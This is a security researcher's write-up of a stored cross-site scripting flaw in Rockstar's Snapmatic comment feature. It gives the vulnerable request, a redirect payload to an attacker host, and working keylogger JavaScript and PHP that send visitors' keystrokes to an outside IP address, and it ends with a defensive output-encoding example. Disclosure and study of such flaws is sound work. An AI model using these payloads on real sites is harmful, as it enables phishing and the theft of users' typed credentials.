Stored XSS on Rockstar Game

Arbaz Hussain
Jul 26, 2017 · 2 min read

Severity: High

Complexity: Easy

Weakness: Cross-Site Scripting

Date: Nov 2016


  • Rockstar’s current game, GTA V, has a feature called Snapmatic: an in-game app for taking pictures while playing. The pictures are uploaded to socialclub.rockstargames.com.

https://socialclub.rockstargames.com/games/gtav/pc/snapmatic

  • Other Rockstar Games users can view and comment on Snapmatic pictures.
  • The vulnerability: comments posted on Snapmatic pictures were not filtered for malicious HTML tags or JavaScript, and the comment body was stored and rendered as-is.

POST /games/gtav/snapmatic/ajax/comment HTTP/1.1
Host: socialclub.rockstargames.com
Connection: close
Content-Length: 57
Accept: application/json, text/javascript, */*; q=0.01
RequestVerificationToken: REDACTEDTOKEN
Origin: https://socialclub.rockstargames.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/json
Referer: https://socialclub.rockstargames.com/games/gtav/snapmatic/mostrecent/photo/zVqgrrjUl0q8tRsmDvMi0w
Accept-Language: en-US,en;q=0.8
Cookie: csrf:token<REDACTED>
{"ugcId":"PICTUREID","comment":"PAYLOAD HERE"}

  • I used the basic payload to check the response and got a script popup.

  • Worst scenario: the script was executed directly in the background when viewing images from https://socialclub.rockstargames.com/games/gtav/pc/snapmatic, probably because that page renders the first comments of each picture.
  • To increase the impact, I tried to find ways to make other users comment the payload on Snapmatic images, just like a worm, using AJAX calls, but unfortunately they were using extra protection for CSRF checking, as you can see from the request above.
  • As the payload is rendered directly on the main page /snapmatic,
  • we can redirect all the users visiting /snapmatic to a URL of the attacker's choice, just like phishing:
<script>window.onload = window.location.href = 'https://attacker.com';</script>

  • Or by adding a keylogger:
  • Keylog.js
document.onkeypress = function(evt) {
  evt = evt || window.event;
  var key = String.fromCharCode(evt.charCode);
  if (key) {
    var http = new XMLHttpRequest();
    var param = encodeURI(key);
    http.open("POST", "http://52.61.158.123/keylog/keylog.php", true);
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.send("key=" + param);
  }
};
  • Keylog.php
<?php
$key = $_POST['key'];
$logfile = "keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>
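The root cause above is that the stored comment was written into the page without output encoding. As an added example (not Rockstar's code), the function below shows the encoding step a comment renderer needs: it HTML-encodes the comment body, restricts the ugcId to the identifier shape seen in the request above (an assumption), and turns the redirect payload from this post into inert text.

```javascript
// Added example: server-side output encoding for a Snapmatic-style comment.
// Assumes the comment is rendered as element text and the ugcId as an attribute.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Encode every character that could change the HTML parser's state.
function escapeHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumption: ugcIds are URL-safe tokens like the one in the Referer above.
// Anything else is rejected rather than written into an attribute.
function safeUgcId(ugcId) {
  if (!/^[A-Za-z0-9_-]{1,64}$/.test(String(ugcId))) {
    throw new Error('rejected ugcId: ' + JSON.stringify(ugcId));
  }
  return ugcId;
}

// Build the markup the way an auto-escaping template engine would.
function renderComment({ ugcId, comment }) {
  return `<li data-ugc-id="${safeUgcId(ugcId)}"><p class="comment">${escapeHtml(comment)}</p></li>`;
}

// Constructed sample: the redirect payload from the post, stored as a comment.
const storedComment = {
  ugcId: 'zVqgrrjUl0q8tRsmDvMi0w',
  comment: "<script>window.onload = window.location.href = 'https://attacker.com';</script>",
};

// True when the encoded text can no longer open a tag or close an attribute.
function isInertText(encoded) {
  return !/[<>"']/.test(encoded);
}

console.log(renderComment(storedComment));
```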
